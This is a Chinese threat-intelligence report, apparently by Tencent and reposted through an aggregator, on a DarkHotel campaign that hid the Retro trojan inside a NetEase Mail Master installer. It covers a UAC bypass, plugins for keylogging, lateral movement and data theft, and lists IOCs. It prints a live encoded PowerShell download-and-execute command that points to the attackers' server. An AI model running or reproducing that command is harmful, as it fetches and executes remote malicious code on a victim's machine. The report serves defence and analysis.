33

“寄生兽”(DarkHotel)针对中国外贸人士的最新攻击活动披露

 4 years ago
source link: https://www.tuicool.com/articles/bmqeAvz
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

一、事件概述

腾讯御见威胁情报中心曾在2018年4月披露过”寄生兽”(DarkHotel)在2018年针对中国外贸企业高管的定向攻击活动。近期,我们再次检测到该攻击组织的最新攻击活动,依然针对跟半岛地区相关的外贸企业高管进行的攻击活动。

本次攻击活动跟之前的攻击活动相比,整体的攻击框架变化不大,如依然寄生在正常的软件里(网易邮箱大师)、采用插件模式等。但是在技术细节上也进行了一定的更新,如更新了绕过UAC的技术,更新了根据杀软情况使用不同启动方式等技术。

“寄生兽”是腾讯御见威胁情报在2017年捕捉的一个APT特种木马(以下简称“特马”),该特马的特征为喜欢把恶意文件隐藏在开源的代码或者正常软件中进行伪装,如putty、openssl、zlib等,把少量木马代码隐藏在大量的开源代码中,从而实现躲避检测的目的,因此将其取名“寄生兽”。而同时经过大量的溯源、关联,我们确定该特马为APT攻击组织DarkHotel(“黑店”)所有。

二、技术细节

1、 攻击入口

本次攻击疑似采用水坑攻击的方法,把网易邮箱大师的主程序和木马文件捆绑在一起,然后进行传播。

打包伪装的网易邮箱大师文件(没有数字签名):

7NrYz2M.jpg!web

木马释放的真正的网易邮箱大师的文件(有数字签名):

rIj6byU.jpg!web

ENrQfuY.jpg!web

2、 安装器(Installer)分析

本次攻击的主程序为捆绑了网易邮箱大师的主程序的恶意文件,该文件会释放真正的网易邮箱大师主程序运行,然后下载恶意的木马dll并加载。

1) Starts.exe

该文件首先解密出C2和木马版本标记信息:

ZrmUjqb.jpg!web

在当前目录下释放starts.exe,并执行,释放出的文件是网易邮箱大师的主文件:

J3q6ziA.jpg!web

如果成功运行starts.exe则开始进行木马下载行为:连接C2,并post 8字节随机数据,接收返回数据:

QZ3iMbQ.jpg!web

下载成功后,通过定位ReflectiveLoader函数进行自加载:

NFBBZnZ.jpg!web

2) WWWWXXXX.dll

该dll为Starts加载的dll。首先判断加载自身的进程,如果是powershell,则开始进行下载行为:

Ina6vqz.jpg!web

获取本机信息,包括计算机名、用户名等信息及进程列表:

YRr6Zjm.jpg!web

检测指定目录下是否有lame.dll,如果没有则开始下载,有则退出:

y2ENBjz.jpg!web

解密出下载url,进行下载,下载后比较是否为<!DOCTYPE html>开头,是则开始解密:

fMzMVrR.jpg!web

解密完后写入到lame.dll中:

ZRbUBrR.jpg!web

此外,如果当前dll是由winword.exe进程加载,则使用rundll32.exe加载本dll并调用lame函数:

eu2uyy7.jpg!web

lame函数中检测360tray.exe、ZhuDongFangYu.exe、QHSafeTray.exe、QHActiveDefense.exe、AvastUI.exe、avgui.exe杀软进程,如果存在任何一个则下载lame.dll,并执行命令将其拷贝到system32目录中命名为msTracer.dll进行劫持,并将wsearch服务设为开机启动实现开机自启:

6bii2iN.jpg!web

如果不存在则创建rundll32.exe进程加载本dll并调用其lame3函数:

iequYjq.jpg!web

Lame3函数主要实现通过修改注册表使得lame.dll开机自启动:

YfM3MfA.jpg!web

如果是SearchIndexer.exe加载本dll则创建SearchProtocolHost.exe进程:

NVfqi23.jpg!web

至此,完成整个恶意文件的安装过程。

3、 绕过uac(bypass uac)分析

WWWWXXXX.dll运行过程中如果发现当前进程非管理员权限,会先释放绕过UAC的dll文件来绕过UAC(756676dbc90f5a66fc565be538dec896),该dll通过利用CMSTP绕过UAC。

3iUZFze.jpg!web

4、 加载器(loader)分析

lame.dll为木马loader程序。木马总体结构,启动技术等与之前版本基本相同,可以确定为Retro RAT 木马的最新版本。木马在多个位置调用了核心下载函数,该函数有两种模式,参数分别为1和0:

ZjQnAjM.jpg!web

首先解密出url域名和参数,然后进行网络访问:

E7fMBrf.jpg!web

解密C2并构造url:

FjEFj2Y.jpg!web

解密出的C2:

VjyUfyQ.jpg!web

判断返回的指令,如果含reset则删除vector.dat文件,如果含<!DOCTYPE html>字符则将数据解密:

YNfi6ba.jpg!web

根据下载函数的调用模式处理解密后的数据:

模式1:在自身进程中申请内存,并创建线程直接执行解密后的代码

yA77jeu.jpg!web

模式2:搜索特征,定位PE文件机构,查找ReflectiveLoader自加载函数进行调用加载执行

eaUvqeM.jpg!web

JB7jq2a.jpg!web

aY7RfqN.jpg!web

ZBVbmiu.jpg!web

5、 插件分析

采用插件形式,也是本系列木马的一个特色,本次攻击我们发现了非常多的恶意木马插件,主要如下:

1) 插件一:

执行powershell命令:

powershell -ex bypass -eJAB1AHIAbAA9ACcAaAB0AHQAcAA6AC8ALwBnAGEAbQBlAC0AcwBlAHIAdgBpAGMAZQAuAG8AcgBnAC8AcgBtAGUAdABfAHgANgA0AC4AdAB4AHQAJwA7ACQAdwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJAB1AHIAbAApADsAaQBlAHgAIAAkAHMAOwA=

2MRbIbn.jpg!web

其功能是下载 http://game-service.org/rmet_x64.txt 并作为powershell脚本执行,内容如下:

ZV7V3in.jpg!web

其功能是解密出一段脚本并创建powershell进程执行,解密后的脚本如下:

JFjuInJ.jpg!web

其功能是申请一块内存,并解密出一段shellcode,创建线程执行shellcode:

m6Rf6zV.jpg!web

BfqEbuU.jpg!web

连接193.29.187.178:51217

qqmYfqB.jpg!web

Recv 4字节数据后将其作为大小申请内存,再recv该大小的数据,然后跳入数据(shellcode)中执行。

事实上,该文件也存在x86版本: http://game-service.org/rmet_x86.txt

v2yM3uI.jpg!web

功能和x64类似,不再赘述。

2) 插件二:mkmfc.dll(5f28da2bbbed8ffb3728855f1910ba6d)

该插件为键盘记录插件,本插件用于键盘记录,记录按键信息、窗口标题、时间:

AN3qyez.jpg!web

32IjIzj.jpg!web

3) 插件三:weepyll_x64.dll(691519faf521d524f21a578209809db2)

内网渗透插件,主要用于横向移动:

faQrYv6.jpg!web

beAZ3un.jpg!web

C2为:193.29.187.178:51218

4) 插件四:hird.dll(6468180d1fcf15a8c8420a60268b642d)

该插件用于用于窃取数据库文件:

BBB3mi2.jpg!web

5) 插件五:nksen.dll(d7f0cee4a3ca878e24c770b0a1874920)

该插件用于屏幕监控:

MbaeEjZ.jpg!web

6) 插件六:xrat_ps-91.235.116.147.exe

该插件主要有3个文件:

igfxrot.exe(a7daffc2420752412ebae9a66d405a48)

TiWork.exe(70c46cb056f338a7535e7b4d2254f09e)

TiWork.exe(90921b35bb51c8db8f4fef6988d9fac2)

三个文件均为开源远程控制木马XRAT,该远控可以进行键盘记录、远程下载执行恶意文件、上传文件、反向代理等功能:

vEj2Yfb.jpg!web

ruqEJjV.jpg!web

qQzENrq.jpg!web

C2均为:91.235.116.147

三、关联分析

经过关联分析,我们确定该次攻击来源于DarkHotel(“黑店”),并且使用的是最新的Retro系列木马(寄生兽)。

关联一:本次木马文件中含有大量调试提示信息,可见木马名称为Retro,与之前的寄生兽木马一致:

be2QZb6.jpg!web

关联二:本次攻击使用的部分c2也曾经用于之前的攻击:

B7ZjQba.jpg!web

QBVVnmq.jpg!web

Bv6FfeI.jpg!web

关联三:url参数格式

本次通信的参数格式跟之前的寄生兽活动一致:

IZZviuM.jpg!web

FRjEnyn.jpg!web

因此我们确定该活动为”寄生兽”(darkhotel)的最新攻击活动。

四、总结

“寄生兽”木马是一个复杂的恶意木马,并且喜欢隐藏中正常的软件和开源代码中,这也大大增加了检测和防御的难度。并且模块不落地、插件模式,已经越来越成为主流,被大量的APT攻击组织所使用。

此外,外贸行业、企业高管为Darkhotel(“黑店”)APT组织的重点攻击对象,该组织擅长通过伪造高端酒店WiFi或劫持网络连接等方式释放攻击程序,高危人群应高度重视。我们建议参考以下几点加强防御:

1、 通过官方渠道或者正规的软件分发渠道下载相关软件;

2、谨慎连接公用的WiFi网络。若必须连接公用WiFi网络,建议不要进行可能泄露机密信息或隐私信息的操作,如收发邮件、IM通信、银行转账等;最好不要在连接公用WiFi时进行常用软件的升级操作;

3、不要打开不明来源的邮件附件;

4、及时打系统补丁和重要软件的补丁;

五、附录

1、IOCs

MD5:

eaa751a36a6da7b1520a5ee38f33cf5b mstracer.dll(lame.dll/oci.dll)
d7f0cee4a3ca878e24c770b0a1874920 nksen.dll
6468180d1fcf15a8c8420a60268b642d hird.dll
691519faf521d524f21a578209809db2 weepyll.dll
5f28da2bbbed8ffb3728855f1910ba6dmkmfc.dll
bd50caef3fac72d7e29e90ee76b8c361 WWWWXXXX.dll
7c72def5a30d1e6bca85ea22a4c5ee15 starts.exe
a7daffc2420752412ebae9a66d405a48 igfxrot.exe
70c46cb056f338a7535e7b4d2254f09e TiWork.exe
90921b35bb51c8db8f4fef6988d9fac2 TiWork.exe
756676dbc90f5a66fc565be538dec896

C2:

http://game-service.org/584e3411-14a7-41f4-ba1d-e203609b0471/6126.php ;

http://office-update-checker.com/584e3411-14a7-41f4-ba1d-e203609b0471/6126.php ;

http://game-service.org/rmet_x64.txt

http://game-service.org/rmet_x86.txt

193.29.187.178:51217

193.29.187.178:51218

http://offices-support.com/7cdeb7fe-6efd-4459-be2f-1eb0e0088a60/21147.php ;

91.235.116.147:9782

http://star--co.net/banila/config.php ;

http://100100011100.com/banila/config.php ;

http://779999977.com/banila/config.php ;

http://banilasky.com/banila/config.php ;

pdb:

C:\Work\GLonginusLance\x64\Release\GLonginusLanceWin32UACMEInit_x64_Release.pdb

C:\workspace\201808-NewKeyLogger\mkmfc\x64\mkmfc_x64.pdb

2、参考链接

1)腾讯御见: https://s.tencent.com/research/report/465.html

2)奇安信: https://ti.qianxin.com/blog/articles/analysis-of-darkhotel/

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK